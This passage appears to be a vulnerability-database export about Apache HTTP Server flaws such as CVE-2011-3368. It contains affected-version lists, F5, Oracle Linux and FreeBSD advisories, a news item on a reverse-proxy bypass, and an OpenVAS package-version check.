"cpe:2.3:a:apache:http_server:1.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.64:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.51:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.53:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.65:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.60:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.52:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.57:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.56:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.28:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.58:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.32:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.61:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.68:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.63:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.59:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.34:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.48:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.55:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.4:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-12-19T06:45:37", "bulletinFamily": "software", "cvelist": ["CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "description": "\nF5 Product Development has assigned ID 377332 (BIG-IP), ID 474664 (Enterprise Manager), and ID 431234 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H492118 on the **Diagnostics** &gt;** Identified** &gt; **Medium** screen. \n\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP AAM | None | 11.4.0 - 11.6.0 | None \nBIG-IP AFM | None | 11.3.0 - 11.6.0 | None \nBIG-IP Analytics | 11.0.0 - 11.1.0 | 11.2.0 - 11.6.0 | httpd (Configuration utility, iControl) \nBIG-IP APM | 11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP ASM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP Edge Gateway | 11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP GTM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n| 11.2.0 - 11.6.0 \n10.2.4 HF12 \n| httpd (Configuration utility, iControl) \nBIG-IP Link Controller | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP PEM | None | 11.3.0 - 11.6.0 | None \nBIG-IP PSM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.4.1 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP WebAccelerator | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP WOM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nARX | 6.2.0 - 6.4.0* | None | Management API (disabled by default) \nEnterprise Manager | 2.1.0 - 2.3.0 | 3.0.0 - 3.1.1 | httpd (Configuration utility, iControl) \nFirePass | None | 7.0.0 \n6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | None \nBIG-IQ ADC | None | 4.5.0 | None \n \n* ARX is not vulnerable to CVE-2012-0021. \n\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists. \n \nF5 is responding to this vulnerability as determined by the parameters defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>). \n\n\nTo mitigate this vulnerability for ARX, do not enable the API functionality.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2016-01-09T02:05:00", "published": "2014-12-04T09:32:00", "href": "https://support.f5.com/csp/article/K15889", "id": "F5:K15889", "title": "Apache HTTP server vulnerabilities CVE-2011-3368, CVE-2011-4317, CVE-2012-0021, CVE-2012-0031, and CVE-2012-0053", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:23:18", "bulletinFamily": "software", "cvelist": ["CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "edition": 1, "description": " * [CVE-2011-3368](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368>) \n \nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.\n * [CVE-2011-4317](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4317>) \n \nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.\n * [CVE-2012-0021](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021>) \n \nThe log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.\n * [CVE-2012-0031](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031>) \n \nscoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.\n * [CVE-2012-0053](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053>) \n \nprotocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.\n", "modified": "2015-08-03T00:00:00", "published": "2014-12-03T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15889.html", "id": "SOL15889", "title": "SOL15889 - Apache HTTP server vulnerabilities CVE-2011-3368, CVE-2011-4317, CVE-2012-0021, CVE-2012-0031, and CVE-2012-0053", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-06-08T00:16:04", "bulletinFamily": "software", "cvelist": ["CVE-2011-3639", "CVE-2011-3368"], "edition": 1, "description": "\nF5 Product Development has assigned ID 431234 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 \n11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 \n11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| 6.0.0 - 6.4.0| None| Low| Management API (disabled by default) \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity **values published in the previous table. The **Severity **values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for the ARX system, do not enable the API functionality.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n * [K3430: Installing FirePass hotfixes](<https://support.f5.com/csp/article/K3430>)\n * [K6664: Obtaining and installing OPSWAT hotfixes](<https://support.f5.com/csp/article/K6664>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "modified": "2016-01-09T02:32:00", "published": "2015-12-30T01:32:00", "id": "F5:K20979231", "href": "https://support.f5.com/csp/article/K20979231", "title": "Apache vulnerability CVE-2011-3639", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:35", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368"], "description": "[2.2.3-53.0.2.el5_7.3]\r\n- Fix mod_ssl always performing full renegotiation (orabug 12423387)\r\n- replace index.html with Oracle's index page oracle_index.html\r\n- update vstring and distro in specfile\r\n \n[2.2.3-53.3]\r\n- add security fix for CVE-2011-3368 (#743903)\r\n- fix regressions in byterange handling (#736593)", "edition": 4, "modified": "2011-10-20T00:00:00", "published": "2011-10-20T00:00:00", "id": "ELSA-2011-1392", "href": "http://linux.oracle.com/errata/ELSA-2011-1392.html", "title": "httpd security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:47", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3347", "CVE-2011-3368", "CVE-2011-3192", "CVE-2011-3348"], "description": "[2.2.15-9.0.1.el6_1.3]\n- replace index.html with Oracle's index page\n- update vstring in specfile\n[2.2.15-9.3]\n- add security fixes for CVE-2011-3347, CVE-2011-3368 (#743901)\n- fix regressions in CVE-2011-3192 patch (#736592)", "edition": 4, "modified": "2011-10-20T00:00:00", "published": "2011-10-20T00:00:00", "id": "ELSA-2011-1391", "href": "http://linux.oracle.com/errata/ELSA-2011-1391.html", "title": "httpd security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:55", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368"], "description": "\nApache HTTP server project reports:\n\nAn exposure was found when using mod_proxy in reverse proxy mode.\n\t In certain configurations using RewriteRule with proxy flag, a\n\t remote attacker could cause the reverse proxy to connect to an\n\t arbitrary server, possibly disclosing sensitive information from\n\t internal web servers not directly accessible to attacker. There\n\t is no patch against this issue!\n\n", "edition": 4, "modified": "2011-10-05T00:00:00", "published": "2011-10-05T00:00:00", "id": "D8C901FF-0F0F-11E1-902B-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html", "title": "Apache 1.3 -- mod_proxy reverse proxy exposure", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:53", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "description": "\nCVE MITRE reports:\n\nAn exposure was found when using mod_proxy in reverse proxy\n\t mode. In certain configurations using RewriteRule with proxy\n\t flag or ProxyPassMatch, a remote attacker could cause the reverse\n\t proxy to connect to an arbitrary server, possibly disclosing\n\t sensitive information from internal web servers not directly\n\t accessible to attacker.\nInteger overflow in the ap_pregsub function in server/util.c in\n\t the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through\n\t 2.2.21, when the mod_setenvif module is enabled, allows local\n\t users to gain privileges via a .htaccess file with a crafted\n\t SetEnvIf directive, in conjunction with a crafted HTTP request\n\t header, leading to a heap-based buffer overflow.\nAn additional exposure was found when using mod_proxy in\n\t reverse proxy mode. In certain configurations using RewriteRule\n\t with proxy flag or ProxyPassMatch, a remote attacker could cause\n\t the reverse proxy to connect to an arbitrary server, possibly\n\t disclosing sensitive information from internal web servers\n\t not directly accessible to attacker.\nA flaw was found in mod_log_config. If the '%{cookiename}C' log\n\t format string is in use, a remote attacker could send a specific\n\t cookie causing a crash. This crash would only be a denial of\n\t service if using a threaded MPM.\nA flaw was found in the handling of the scoreboard. An\n\t unprivileged child process could cause the parent process to\n\t crash at shutdown rather than terminate cleanly.\nA flaw was found in the default error response for status code\n\t 400. This flaw could be used by an attacker to expose\n\t \"httpOnly\" cookies when no custom ErrorDocument is specified.\n\n", "edition": 4, "modified": "2011-10-05T00:00:00", "published": "2011-10-05T00:00:00", "id": "4B7DBFAB-4C6B-11E1-BC16-0023AE8E59F0", "href": "https://vuxml.freebsd.org/freebsd/4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0.html", "title": "apache -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T23:04:19", "bulletinFamily": "info", "cvelist": ["CVE-2011-3368"], "description": "[](<https://threatpost.com/new-apache-reverse-proxy-issue-uncovered-112611/>)A new reverse proxy issue affecting Apache HTTP server can be used by attackers to access internal systems if certain rules are improperly configured, a security researcher said.\n\nPrutha Parikh, vulnerability signature engineer at Qualys, blogged that she uncovered the issue while creating a QualysGuard vulnerability signature for another reverse proxy issue, detailed in CVE-2011-3368. While reviewing the patch for the older bug, she discovered it was still possible to use a crafted request to exploit a fully-patched Apache Web Server.\n\nIn the proof-of-concept demonstrations [detailed here in her blog post](<https://community.qualys.com/blogs/securitylabs/2011/11/23/apache-reverse-proxy-bypass-issue>), Parikh outlined two examples where an Apache Web Server (version 2.2.21) with the CVE-2011-3368 patch applied, a reverse proxy set up and incorrectly configured RewriteRule/ProxyPassMatch rules could be compromised by an attacker looking to circumvent security mechanisms.\n\n\u201cThe patch for CVE-2011-3368 is straight forward and self explanatory,\u201d she blogged. \u201cThe \u201cserver/protocol.c\u201d file was modified. The patch looks at the request being sent and returns a HTTP 400 Response (Bad Request) if the URL does not begin with a forward slash \u201c/\u201d.\u201d\n\n\u201cThis part of the code takes care of the issue for CVE-2011-3368,\u201d she continued.\n\nHowever, a closer analysis of the patch reveals it does not process URIs (uniform resource identifiers) that have a scheme, she added.\n\nAs a result, \u201cif a malformed URL request with a scheme was constructed, it would still be possible to bypass security and gain access to systems on the internal server provided that the reverse proxy rules were incorrectly configured,\u201d she wrote.\n\nApache developers are working on a [fix to address the issue](<http://mail-archives.apache.org/mod_mbox/httpd-dev/201111.mbox/%3c4ECF43AF.8060602@vodafone.com%3e>). \n", "modified": "2013-04-17T16:33:17", "published": "2011-11-26T23:41:49", "id": "THREATPOST:0413CB7CEB3A83FB6F02DBDDD013A75E", "href": "https://threatpost.com/new-apache-reverse-proxy-issue-uncovered-112611/75927/", "type": "threatpost", "title": "New Apache Reverse Proxy Issue Uncovered", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2019-05-29T18:36:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "description": "Oracle Linux Local Security Checks ELSA-2011-1392", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122067", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2011-1392", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1392.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122067\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:12:31 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1392\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1392 - httpd security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1392\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1392.html\");\n script_cve_id(\"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2011-10-10T00:00:00", "id": "OPENVAS:1361412562310831460", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831460", "type": "openvas", "title": "Mandriva Update for apache MDVSA-2011:144 